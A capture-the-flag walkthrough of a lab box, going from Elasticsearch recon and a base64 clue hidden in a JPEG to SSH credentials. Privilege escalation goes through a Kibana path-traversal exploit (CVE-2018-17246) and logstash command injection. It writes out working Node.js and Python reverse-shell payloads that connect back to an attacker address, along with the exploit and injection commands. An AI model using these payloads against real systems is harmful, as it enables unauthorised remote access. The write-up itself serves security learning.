The site on regular HTTP port 80 is very bare, only giving us a picture and nothing else:
The site on HTTP 9200 has more going on. It is an elasticsearch service version 6.4.2:
So the picture is a clue that we’ll be looking up something in the search database. Hence the “needle”: the thing you search for is sometimes called the needle, as in “needle in a haystack”.
It’s possible this version of elasticsearch has a public exploit. I did find one, CVE-2018-17246, but it targets the “Console” plugin and doesn’t appear to work here…
REST API
I didn’t know anything about elasticsearch before this box, so I’ll write out things as I learn them and hope it all goes well. Port 9200 is used for elasticsearch’s REST API, so we’ll need to learn how to use it from elasticsearch’s documentation.
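To get oriented, a bare GET against the root endpoint returns basic cluster and version info. The output below is a sketch of the typical shape, not the box’s exact response:

```
curl -XGET "10.10.10.115:9200/"
# {
#   "name" : "...",
#   "cluster_name" : "elasticsearch",
#   "version" : { "number" : "6.4.2", ... },
#   "tagline" : "You Know, for Search"
# }
```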
When I tried a typical POST query request, I got an error stating that the server doesn’t support POST.
And that’s because I wasn’t using it correctly, since I didn’t know what I was doing.
Here’s a request that returns something.
And here is the formatted JSON:
Using curl -XGET "10.10.10.115:9200/bank/" will show the structure (the mapping) of the “bank” index. We can do the same for “.kibana”, which might be a little more interesting. But honestly, I didn’t see anything in either that was really useful unless you’re a spammer collecting email addresses. If we knew what ALL the indexes are, then maybe we could find something better.
Use curl -XGET "10.10.10.115:9200/_cat/indices?v" to find out what the indexes are:
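The `?v` flag adds a header row, and the listing has one line per index. The UUIDs, counts, and sizes are elided in this sketch; on this box the list included at least “bank” and “.kibana”:

```
health status index   uuid  pri rep docs.count docs.deleted store.size pri.store.size
...    open   .kibana ...   ... ... ...        ...          ...        ...
...    open   bank    ...   ... ... ...        ...          ...        ...
```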
And you can get the structure of them all by using curl -XGET "10.10.10.115:9200/*/".
After playing with submitting queries, my favorite way to submit them is on the URI like… curl -XGET "10.10.10.115:9200/bank/_search/?pretty=true&q=web*" … where the “q=” is the search string.
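Matches come back under hits.hits, with the actual document body in _source. A sketch of the response shape:

```
curl -XGET "10.10.10.115:9200/bank/_search/?pretty=true&q=web*"
# {
#   "hits" : {
#     "total" : ...,
#     "hits" : [
#       { "_index" : "bank", "_id" : "...", "_score" : ..., "_source" : { ... } }
#     ]
#   }
# }
```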
While searching around in the data, I found this bit of encouragement to know I’m on the right track:
After a while of trying different searches like curl -XGET "10.10.10.115:9200/_search?pretty=true&q=needle" and getting nowhere fast, I decided to reassess where I was in the challenge. Normally when I’m stuck it’s because I’m overlooking something I should have paid closer attention to. Along with the help of a hint from a forum post that said the picture wasn’t actually useless, I was able to find another clue.
I downloaded the image of the needle from the port 80 website, and ran a “file” check on it to see if anything odd stood out.
Nothing out of the ordinary there, so then I printed out the data with “cat”, hoping there might be a hidden string in the padding at the end of the file. That’s a pretty common steganography trick with JPEG files. Sure enough, there was! It was a base64 encoded string, so I extracted it and decoded it:
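The mechanics of the extraction look something like this (the filename is assumed; the base64 blob sits on the last line of the file):

```
# the appended string shows up at the tail of the printable strings
strings needle.jpg | tail -n 1
# pipe it straight into base64 to decode
strings needle.jpg | tail -n 1 | base64 -d
```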
Google Translate tells me this is Spanish for:
the needle in the haystack is "key"
Great! We can query elasticsearch for that and hopefully get somewhere…
My first query was for “key”, but that only returned a couple bank accounts that weren’t helpful. So then I searched for “clave” and got two hits that looked good:
“Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk=” which has a base64 string that decodes to “pass: spanish.is.key”.
And “Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg ” which has another base64 string that decodes to “user: security”.
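For reference, the query and the decoding steps:

```
curl -XGET "10.10.10.115:9200/_search?pretty=true&q=clave"
echo 'dXNlcjogc2VjdXJpdHkg' | base64 -d          # user: security
echo 'cGFzczogc3BhbmlzaC5pcy5rZXk=' | base64 -d  # pass: spanish.is.key
```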
Bingo! This should be the login to the SSH server.
SSH
Logging in over SSH with the credentials we found gives access to the user flag.
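The login is as simple as:

```
ssh security@10.10.10.115
# password: spanish.is.key
```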
Looking at the process list shows some processes running under the users “kibana” and “elasticsearch”. There was an exploit found early in the recon phase that affects the version of kibana on this box; it just wasn’t usable for the first stage.
Earlier when we tried to attack kibana it said we were barking up the wrong tree…
…but if the same query is used against the local interface for kibana, we get a different kind of result:
…suggesting we may be able to use the exploit after all.
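The public PoC for CVE-2018-17246 abuses a path traversal in the Console plugin to make kibana require() an arbitrary local JavaScript file, which executes it. Roughly like this (the traversal depth and the payload path will vary; /tmp is an assumption here):

```
curl "http://localhost:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../../../tmp/shellb.js"
```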
At first I tried to run the exploit code from within the SSH session, but got no results. Then I skimmed a page or two of the forum, where several hints suggested setting up an SSH tunnel to reach port 5601 remotely. So I read up on SSH tunneling, since it is kinda confusing. I got the tunnel built with ssh -L 5601:localhost:5601 security@10.10.10.115 and proved the connection worked by sending one of the previous commands from my box:
At that point we can even open the Kibana app in the browser.
But what we really want is to run the exploit and get a reverse shell.
The above screenshot shows the tunnel connection where I created the payload file “shellb.js”, the exploit command being sent to my tunneled port, and finally the reverse shell connecting back on the left =).
The kibana payload file:
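It’s the well-known Node.js reverse shell used with this CVE; this is a sketch with a placeholder attacker IP and port (and an assumed /tmp path):

```
cat > /tmp/shellb.js <<'EOF'
(function(){
    var net = require("net"),
        cp  = require("child_process"),
        sh  = cp.spawn("/bin/bash", []);
    var client = new net.Socket();
    // connect back to the attacker box -- IP and port are placeholders
    client.connect(4444, "10.10.14.2", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // keeps the node process from crashing
})();
EOF
```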
One caveat about the exploit, though: if the reverse shell breaks, you may need to rename the payload file before sending the exploit again.
Set up the PTY for the shell once you are in (makes things a little easier)…
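The usual python trick works here:

```
python -c 'import pty; pty.spawn("/bin/bash")'
```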
I like to make the prompt better, but that’s just me…
Also, while playing with the prompt I goofed on a command and saw something interesting…
Lol, Spanish sure is key!
Anyway, we can search for files we have access to with find / -group kibana. You’ll notice that we have access to configuration files for something called “logstash” as well. Logstash is another piece of the elastic stack, but where kibana visualizes output, logstash collects and processes input.
There were a few files that seemed interesting:
It looks like there could be command injection (type == “execute”) in the output.conf and filter.conf files.
I read some basic info pages on the config files, and I believe it works as follows: our data is defined by the input{} block and given certain attributes such as its type. The data is then processed by the filter{} block. Within the filter block, the grok{} routine uses a parser called Grok to extract structured fields out of the raw text string, in this case a field named “comando”. The results of the filter{} processing are piped to the output{} block for sending to the operating system: to files, to stdout, or, in our case, to shell execution.
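Pieced together from the clues in these files, the relevant parts look roughly like this (a reconstruction consistent with what follows, not a verbatim copy of the box’s configs):

```
# input.conf -- watch files matching the pattern, tag them type "execute"
input {
  file {
    path => "/opt/kibana/logstash_*"
    stat_interval => "10 second"
    type => "execute"
  }
}

# filter.conf -- grok the command text into a field named "comando"
filter {
  if [type] == "execute" {
    grok {
      match => { "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }
    }
  }
}

# output.conf -- hand whatever landed in "comando" to the shell
output {
  if [type] == "execute" {
    exec {
      command => "%{comando} &"
    }
  }
}
```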
According to the stat_interval setting, the file input is polled every 10 seconds, and any new content is processed if the file has grown. The logstash docs describe the loop like this: “Discovering new files and checking whether they have grown/or shrunk occurs in a loop. This loop will sleep for stat_interval seconds before looping again. However, if files have grown, the new content is read and lines are enqueued. Reading and enqueuing across all grown files can take time, especially if the pipeline is congested. So the overall loop time is a combination of the stat_interval and the file read time.”
Creating a file “/opt/kibana/logstash_a” should fit the input{} block of the config file.
Writing “Ejecutar comando: echo test” should fit the grok filter{} block. This can be tested with the Grok Debugger in the Web App we have access to now.
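So a quick end-to-end test from the kibana shell is just:

```
echo 'Ejecutar comando: echo test' > /opt/kibana/logstash_a
```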
Looking at the process list, we can see the logstash process is running as root, so if it can connect out to a reverse shell, we’ll get root!
There’s multiple ways to do it, but creating a python script for the reverse shell and calling the script with the Grok command should work. My reverse shell script:
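A standard python connect-back does the job; the IP, port, and path below are placeholders:

```
cat > /tmp/rev.py <<'EOF'
import socket, subprocess, os

# connect back to the attacker box (placeholder IP/port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.14.2", 5555))

# wire stdin/stdout/stderr to the socket and hand over an interactive shell
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
subprocess.call(["/bin/sh", "-i"])
EOF
```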
And the Grok command to send:
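Reusing the hypothetical script path from above:

```
echo 'Ejecutar comando: python /tmp/rev.py' > /opt/kibana/logstash_a
```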
And it’ll take a little while for the logstash routine to run the payload, but it does eventually work!
From there, just grab the root flag and this box is done!!